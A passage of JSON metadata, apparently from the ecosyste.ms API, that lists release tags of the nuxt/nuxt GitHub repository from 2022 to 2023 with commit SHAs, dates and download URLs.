:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"pu